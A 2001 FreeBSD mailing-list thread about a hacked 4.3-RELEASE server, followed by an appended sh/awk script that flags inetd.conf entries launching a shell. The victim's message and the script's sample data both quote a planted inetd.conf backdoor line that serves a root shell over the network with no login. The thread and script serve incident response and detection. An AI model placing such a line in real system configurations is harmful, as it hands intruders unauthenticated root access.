From: jslivko@4evermail.com
Cc: freebsd-questions@freebsd.org
Subject: Re: I got hacked, I think
Date: Thu, 18 Oct 2001 16:44:02 +0000
Message-Id: <20011018204256.9B25637B403@hub.freebsd.org>

Not to mention there is a new release out, 4.4 :)

--
Jonathan

--- Kent Stewart wrote:
>
>
> Tomek wrote:
> >
> > I found out more info.
> >
> > -rw-r--r-- 1 Broot wheel 54 Sep 26 10:24 /inetd.conf
> > -rw-r--r-- 1 Broot wheel 85857 Sep 26 21:38 /sudo-1.6.3.7_1.tgz
> > -rw------- 1 Broot wheel 4869 Sep 26 10:25 /etc/inetd.conf
> >
> > Checking the bizarre /inetd.conf is shocking:
> > eklogin stream tcp nowait root /bin/sh sh -i
> >
> > I take it that "sh" would not even request a login or anything if called
> > directly from inetd.conf, would it? I am sitting here, he is STILL
> > pinging me and watching the system (even tried to ftp again a few
> > minutes ago), and for the life of me I can't figure out where it all
> > began... how did he even log in the first time, maybe it was some
> > buffer overflow or something.... yuck.
>
> It began because you were using 4.3-release and you probably didn't fix
> the security problems. There were several buffer overflow problems for
> daemons that have been published for 4.3-r. The only solution in case of
> a hack has been to do a wipe and reinstall.
>
> Kent
>
> >
> > TY for all your help guys, you are all wonderful! I will leave you in
> > peace now (I hope). I still don't know about Broot though...
> >
> > To Unsubscribe: send mail to majordomo@FreeBSD.org
> > with "unsubscribe freebsd-questions" in the body of the message
>
> --
> Kent Stewart
> Richland, WA
> http://users.owt.com/kstewart
>
> Carl Sagan quote on Seti@home
> http://setiathome.ssl.berkeley.edu/pale_blue_dot.html
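
An added example, not part of the thread: a small sh/awk check that flags active inetd.conf entries whose server program is a shell, like the `eklogin ... /bin/sh sh -i` line Tomek quotes. The function names, the list of shell names and the sample file contents are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the thread). inetd.conf fields are:
#   service  socket-type  protocol  wait/nowait  user  server-program  args...
# An entry whose server program is a shell gives whoever connects to that
# port an interactive shell as <user>, with no login step in between.

# audit_inetd_conf FILE
# Prints "FILE:LINE: service=... user=... program=..." for every active
# entry that runs a shell. Returns 1 if any was found, 0 otherwise.
audit_inetd_conf() {
    awk -v file="$1" '
        /^[ \t]*#/ { next }                 # commented-out entry
        NF < 6     { next }                 # blank or incomplete line
        {
            n = split($6, parts, "/")       # basename of the server program
            prog = parts[n]
            # Shell names below are an assumed list; extend it for your site.
            if (prog ~ /^(sh|csh|tcsh|bash|ksh|zsh|dash)$/) {
                printf "%s:%d: service=%s user=%s program=%s\n", file, NR, $1, $5, $6
                found = 1
            }
        }
        END { exit (found ? 1 : 0) }
    ' "$1"
}

# Constructed sample: ordinary entries plus the line quoted in the thread.
sample_inetd_conf() {
    cat <<'EOF'
# constructed sample, not a file recovered from the affected host
ftp stream tcp nowait root /usr/libexec/ftpd ftpd -l
#shell stream tcp nowait root /usr/libexec/rshd rshd
daytime stream tcp nowait root internal
eklogin stream tcp nowait root /bin/sh sh -i
EOF
}

demo=$(mktemp)
sample_inetd_conf > "$demo"
audit_inetd_conf "$demo" || echo "shell-backed inetd entry found"
rm -f "$demo"
```

Run it against every inetd.conf on the filesystem, not only /etc/inetd.conf, since the suspicious copy in the thread sat in /.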